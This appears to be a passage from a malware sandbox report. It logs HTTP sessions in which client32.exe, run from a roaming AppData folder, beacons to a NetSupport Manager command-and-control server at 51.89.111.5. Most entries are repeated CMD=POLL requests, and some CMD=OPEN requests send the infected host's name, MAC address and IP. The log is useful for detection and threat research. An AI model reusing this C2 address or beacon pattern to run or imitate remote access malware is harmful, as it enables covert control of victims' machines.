                                                                                                              Nov 1, 2024 18:12:47.284069061 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:47.382838964 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:47.484065056 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:47.583843946 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:47.683820009 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:47.784827948 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:47.884865046 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:47.986231089 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:48.086827040 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:48.186856985 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:48.287545919 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:48.438872099 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:48.644079924 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:48.748061895 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:48.848054886 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:48.946839094 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:49.048062086 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:49.147854090 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:49.247879028 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:49.348826885 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:49.452076912 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:49.552057981 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:49.649971008 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:49.750838995 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:49.850878954 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:49.950875998 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:50.051860094 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:50.152877092 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:50.252845049 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.74997551.89.111.517716276C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 1, 2024 18:13:21.215693951 CET214OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:26.220182896 CET398OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 206Host: 51.89.111.5Connection: Keep-AliveCMD=OPENCLIENT_VERSION=1.0PROTOCOL_VER=1.1MAXPACKET=928CLIENT_NAME=124406CLIENT_ADDR=>192.168.2.7PORT=5405HOSTNAME=124406MACADDRESS=ECF4BB82F7E0GSK=ODyvxTzr7zqv7L)yd6sUoQAACMPI=60APPTYPE=0DEPT=
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:26.320008993 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:26.420967102 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:26.520984888 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:26.622081995 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:26.722290993 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:26.822994947 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:26.923018932 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:27.026395082 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:27.126444101 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:27.228177071 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:27.325031042 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:27.427469015 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:27.526014090 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:27.627710104 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:27.727121115 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:27.827019930 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:27.928112984 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:28.028117895 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:28.128062963 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:28.229211092 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:28.329231024 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:28.430008888 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:28.531013012 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:28.631998062 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:28.732011080 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:28.833204031 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:28.936157942 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:29.033039093 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:29.136151075 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:29.235748053 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:29.336149931 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:29.436162949 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:29.537657976 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:13:29.637007952 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.74997651.89.111.517716276C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 1, 2024 18:14:00.453550100 CET214OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:05.454813004 CET398OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 206Host: 51.89.111.5Connection: Keep-AliveCMD=OPENCLIENT_VERSION=1.0PROTOCOL_VER=1.1MAXPACKET=928CLIENT_NAME=124406CLIENT_ADDR=>192.168.2.7PORT=5405HOSTNAME=124406MACADDRESS=ECF4BB82F7E0GSK=ODyvxTzr7zqv7L)yd6sUoQAACMPI=60APPTYPE=0DEPT=
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:05.559578896 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:05.660267115 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:05.764250994 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:05.861252069 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:05.961321115 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:06.062231064 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:06.163278103 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:06.264303923 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:06.364286900 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:06.465250969 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:06.566241980 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:06.667351007 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:06.767239094 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:06.868263006 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:06.968457937 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:07.068252087 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:07.169224977 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:07.270236015 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:07.370239973 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:14:07.470238924 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
